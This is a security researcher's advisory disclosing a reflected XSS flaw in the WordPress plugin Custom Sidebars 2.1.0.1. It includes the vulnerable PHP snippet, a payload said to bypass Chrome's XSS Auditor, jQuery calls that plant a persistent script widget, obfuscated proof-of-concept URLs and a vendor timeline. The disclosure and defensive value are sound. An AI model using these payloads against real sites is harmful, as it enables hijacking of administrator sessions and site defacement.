Kacper SzurekTagsPolishNewsletterAbout
YouTubeWebinaryFacebookTwitter
Kacper Szurek
TagsPolishNewsletterAboutYouTubeWebinaryFacebookTwitter
Custom Sidebars 2.1.0.1 XSS

23-09-2015 / Vulnerabilities

Custom Sidebars 2.1.0.1 XSS

$_GET['cs-msg'] is not escaped.

File: custom-sidebars\inc\class-custom-sidebars.php

// Display a message after import.
if ( ! empty( $_GET['cs-msg'] ) ) {
	$msg = base64_decode( $_GET['cs-msg'] );
	WDev()->message( $msg );
}

So we have reflected XSS. What is more important it bypass Google Chrome XSS Auditor (tested on 39.0.2171.95):

<IMG SRC=/ onerror="alert(String.fromCharCode(88,83,83))"></img>

But we can elevate this to normal XSS by creating new text sidebar which will be displayed on every page:

jQuery.post(ajaxurl, {"action": "widgets-order", savewidgets: jQuery("#_wpnonce_widgets").val(), "sidebars[sidebar-2]": "widget-200_text-200"});
jQuery.post(ajaxurl, { "widget-text[200][title]": "xss", "widget-text[200][text]": "<script>alert(String.fromCharCode(88,83,83));</script>", savewidgets: jQuery("#_wpnonce_widgets").val(),
 "csb-buttons": "0", "widget-id": "text-200", "id_base": "text",  "widget-width": "400", "widget-height": "350", "widget_number": "200", "action": "save-widget", "sidebar": "sidebar-200", "add_new": "",
 "multi_number": ""} );

Proof of Concept

Admin must visit this crafted urls:

http://wordpress-url/wp-admin/widgets.php?cs-msg=PElNRyBTUkM9LyBvbmVycm9yPSJhbGVydChTdHJpbmcuZnJvbUNoYXJDb2RlKDg4LDgzLDgzKSkiPjwvaW1nPg==

or

http://wordpress-url/wp-admin/widgets.php?cs-msg=PElNRyBTUkM9LyBvbmVycm9yPSJldmFsKCdldmFsKFN0cmluZy5mcm9tQ2hhckNvZGUoMTA2LCA4MSwgMTE3LCAxMDEsIDExNCwgMTIxLCA0NiwgMTEyLCAxMTEsIDExNSwgMTE2LCA0MCwgOTcsIDEwNiwgOTcsIDEyMCwgMTE3LCAxMTQsIDEwOCwgNDQsIDMyLCAxMjMsIDM0LCA5NywgOTksIDExNiwgMTA1LCAxMTEsIDExMCwgMzQsIDU4LCAzMiwgMzQsIDExOSwgMTA1LCAxMDAsIDEwMywgMTAxLCAxMTYsIDExNSwgNDUsIDExMSwgMTE0LCAxMDAsIDEwMSwgMTE0LCAzNCwgNDQsIDMyLCAxMTUsIDk3LCAxMTgsIDEwMSwgMTE5LCAxMDUsIDEwMCwgMTAzLCAxMDEsIDExNiwgMTE1LCA1OCwgMzIsIDEwNiwgODEsIDExNywgMTAxLCAxMTQsIDEyMSwgNDAsIDM0LCAzNSwgOTUsIDExOSwgMTEyLCAxMTAsIDExMSwgMTEwLCA5OSwgMTAxLCA5NSwgMTE5LCAxMDUsIDEwMCwgMTAzLCAxMDEsIDExNiwgMTE1LCAzNCwgNDEsIDQ2LCAxMTgsIDk3LCAxMDgsIDQwLCA0MSwgNDQsIDMyLCAzNCwgMTE1LCAxMDUsIDEwMCwgMTAxLCA5OCwgOTcsIDExNCwgMTE1LCA5MSwgMTE1LCAxMDUsIDEwMCwgMTAxLCA5OCwgOTcsIDExNCwgNDUsIDUwLCA5MywgMzQsIDU4LCAzMiwgMzQsIDExOSwgMTA1LCAxMDAsIDEwMywgMTAxLCAxMTYsIDQ1LCA1MCwgNDgsIDQ4LCA5NSwgMTE2LCAxMDEsIDEyMCwgMTE2LCA0NSwgNTAsIDQ4LCA0OCwgMzQsIDEyNSwgNDEsIDU5LCAxMywgMTAsIDEzLCAxMCwgMTA2LCA4MSwgMTE3LCAxMDEsIDExNCwgMTIxLCA0NiwgMTEyLCAxMTEsIDExNSwgMTE2LCA0MCwgOTcsIDEwNiwgOTcsIDEyMCwgMTE3LCAxMTQsIDEwOCwgNDQsIDMyLCAxMjMsIDMyLCAzNCwgMTE5LCAxMDUsIDEwMCwgMTAzLCAxMDEsIDExNiwgNDUsIDExNiwgMTAxLCAxMjAsIDExNiwgOTEsIDUwLCA0OCwgNDgsIDkzLCA5MSwgMTE2LCAxMDUsIDExNiwgMTA4LCAxMDEsIDkzLCAzNCwgNTgsIDMyLCAzNCwgMTIwLCAxMTUsIDExNSwgMzQsIDQ0LCAzMiwgMzQsIDExOSwgMTA1LCAxMDAsIDEwMywgMTAxLCAxMTYsIDQ1LCAxMTYsIDEwMSwgMTIwLCAxMTYsIDkxLCA1MCwgNDgsIDQ4LCA5MywgOTEsIDExNiwgMTAxLCAxMjAsIDExNiwgOTMsIDM0LCA1OCwgMzIsIDM0LCA2MCwgMTE1LCA5OSwgMTE0LCAxMDUsIDExMiwgMTE2LCA2MiwgOTcsIDEwOCwgMTAxLCAxMTQsIDExNiwgNDAsIDgzLCAxMTYsIDExNCwgMTA1LCAxMTAsIDEwMywgNDYsIDEwMiwgMTE0LCAxMTEsIDEwOSwgNjcsIDEwNCwgOTcsIDExNCwgNjcsIDExMSwgMTAwLCAxMDEsIDQwLCA1NiwgNTYsIDQ0LCA1NiwgNTEsIDQ0LCA1NiwgNTEsIDQxLCA0MSwgNTksIDYwLCA0NywgMTE1LCA5OSwgMTE0LCAxMDUsIDExMiwgMTE2LCA2MiwgMzQsIDQ0LCAzMiwgMTE1LCA5NywgMTE4LCAxMDEsIDExOSwgMTA1LCAxMDAsIDEwMywgMTAxLCAxMTYsIDExNSwgNTgsIDMyLCAxMDYsIDgxLCAxMTcsIDEwMSwgMTE0LCAxMjEsIDQwLCAzNCwgMzUsIDk1LCAxMTksIDExMiwgMTEwLCAxMTEsIDExMCwgOTksIDEwMSwgOTUsIDExOSwgMTA1LCAxMDAsIDEwMywgMTAxLCAxMTYsIDExNSwgMzQsIDQxLCA0NiwgMTE4LCA5NywgMTA4LCA0MCwgNDEsIDQ0LCAxMywgMTAsIDMyLCAzNCwgOTksIDExNSwgOTgsIDQ1LCA5OCwgMTE3LCAxMTYsIDExNiwgMTExLCAxMTAsIDExNSwgMzQsIDU4LCAzMiwgMzQsIDQ4LCAzNCwgNDQsIDMyLCAzNCwgMTE5LCAxMDUsIDEwMCwgMTAzLCAxMDEsIDExNiwgNDUsIDEwNSwgMTAwLCAzNCwgNTgsIDMyLCAzNCwgMTE2LCAxMDEsIDEyMCwgMTE2LCA0NSwgNTAsIDQ4LCA0OCwgMzQsIDQ0LCAzMiwgMzQsIDEwNSwgMTAwLCA5NSwgOTgsIDk3LCAxMTUsIDEwMSwgMzQsIDU4LCAzMiwgMzQsIDExNiwgMTAxLCAxMjAsIDExNiwgMzQsIDQ0LCAzMiwgMzIsIDM0LCAxMTksIDEwNSwgMTAwLCAxMDMsIDEwMSwgMTE2LCA0NSwgMTE5LCAxMDUsIDEwMCwgMTE2LCAxMDQsIDM0LCA1OCwgMzIsIDM0LCA1MiwgNDgsIDQ4LCAzNCwgNDQsIDMyLCAzNCwgMTE5LCAxMDUsIDEwMCwgMTAzLCAxMDEsIDExNiwgNDUsIDEwNCwgMTAxLCAxMDUsIDEwMywgMTA0LCAxMTYsIDM0LCA1OCwgMzIsIDM0LCA1MSwgNTMsIDQ4LCAzNCwgNDQsIDMyLCAzNCwgMTE5LCAxMDUsIDEwMCwgMTAzLCAxMDEsIDExNiwgOTUsIDExMCwgMTE3LCAxMDksIDk4LCAxMDEsIDExNCwgMzQsIDU4LCAzMiwgMzQsIDUwLCA0OCwgNDgsIDM0LCA0NCwgMzIsIDM0LCA5NywgOTksIDExNiwgMTA1LCAxMTEsIDExMCwgMzQsIDU4LCAzMiwgMzQsIDExNSwgOTcsIDExOCwgMTAxLCA0NSwgMTE5LCAxMDUsIDEwMCwgMTAzLCAxMDEsIDExNiwgMzQsIDQ0LCAzMiwgMzQsIDExNSwgMTA1LCAxMDAsIDEwMSwgOTgsIDk3LCAxMTQsIDM0LCA1OCwgMzIsIDM0LCAxMTUsIDEwNSwgMTAwLCAxMDEsIDk4LCA5NywgMTE0LCA0NSwgNTAsIDQ4LCA0OCwgMzQsIDQ0LCAzMiwgMzQsIDk3LCAxMDAsIDEwMCwgOTUsIDExMCwgMTAxLCAxMTksIDM0LCA1OCwgMzIsIDM0LCAzNCwgNDQsIDEzLCAxMCwgMzIsIDM0LCAxMDksIDExNywgMTA4LCAxMTYsIDEwNSwgOTUsIDExMCwgMTE3LCAxMDksIDk4LCAxMDEsIDExNCwgMzQsIDU4LCAzMiwgMzQsIDM0LCAxMjUsIDMyLCA0MSwgNTkpKTsnKTsiPjwvaW1nPg==

Timeline

  • 11-01-2015: Discovered
  • 11-01-2015: Vendor notified
  • 13-01-2015: Version 2.1.0.2 released, issue resolved